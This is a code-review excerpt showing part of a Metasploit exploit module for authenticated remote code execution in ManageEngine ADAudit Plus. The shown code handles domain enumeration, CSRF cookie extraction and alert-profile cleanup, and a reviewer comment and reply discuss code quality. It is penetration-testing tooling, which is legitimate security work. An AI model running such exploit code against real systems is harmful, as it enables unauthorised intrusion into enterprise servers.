modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,726 @@
+      }
+    })
+
+    unless res
+      print_error('Connection failed while attempting to obtain the list of configured domains...')
+      return [1, nil]
+    end
+
+    if res.code == 200 && res.body.include?('domainFullList')
+      unless silent
+        begin
+          domain_info = JSON.parse(res.body)
+          if domain_info.blank? || !domain_info.include?('domainFullList') || domain_info['domainFullList'].empty?
+            print_warning('Failed to identify any configured domains. The module will continue but exploitation may fail.')
+          else
+            domain_full_list = domain_info['domainFullList']
+            print_status("Found #{domain_full_list.length} configured domain(s):")
+
+            if domain_full_list&.first&.include?('name')
+              @domain = domain_full_list.first['name']
+              vprint_status("Using domain #{@domain} for the name of the directory we will be creating")
+            end
+
+            domain_full_list.each do |domain|
+              d_name = domain['name']
+              value = domain['value']
+              print_status("- #{d_name}: #{value}")
+            end
+          end
+        rescue JSON::ParserError => e
+          print_error('Failed to identify any configured domains - The server response did not contain valid JSON')
+          print_line(e)
+        end
+      end
+    else
+      print_error('Failed to obtain the list of configured domains.')
+      print_warning('While this failure is not critical, it is unexpected, so the exploit may fail.')
+    end
+
+    # return the value of the adapcsrf cookie, which will be required for later actions
+    adapcsrf_cookie = cookie_jar.cookies.select { |k| k.name == 'adapcsrf' }&.first
+    if adapcsrf_cookie.blank? || adapcsrf_cookie.value.blank?
+      print_error('Failed to obtain the required adapcsrf cookie')
+      return [2, nil]
+    end
+
+    [0, adapcsrf_cookie.value]
+  end
+
+  def delete_alert(adapcsrf_cookie)
+    print_status("Attempting to delete alert profile #{@alert_name}")
+    # let's try and get the the ID of the alert we want to delete
+    res1 = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'api', 'json', 'leftTrees', 'getLeftTreeList'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'TAB_ID' => '5', # this cannot be randomized
+        'adapcsrf' => adapcsrf_cookie
+      }
+    })
+
+    unless res1
+      print_error("Connection failed when attempting to obtain the alert profile ID #{@alert_name}")
+      print_warning('Manual cleanup required.')
+      return
+    end
+
+    unless res1.code == 200 && res1.body =~ /modelId":(\d+),"name":"#{@alert_name}/
+      print_error("Received unexpected reply when attempting to obtain the alert profile ID #{@alert_name}")
+      print_warning('Manual cleanup required.')
+      return
+    end
+
+    alert_id = res1.body.scan(/modelId":(\d+),"name":"#{@alert_name}/)&.flatten&.first
```

Comment:
Correct me if I'm wrong but two things here. Firstly should we not be checking that res1.body isn't empty? Secondly, could we not save the scan results so we don't end up doing it twice?

Reply:
agreed, fixing this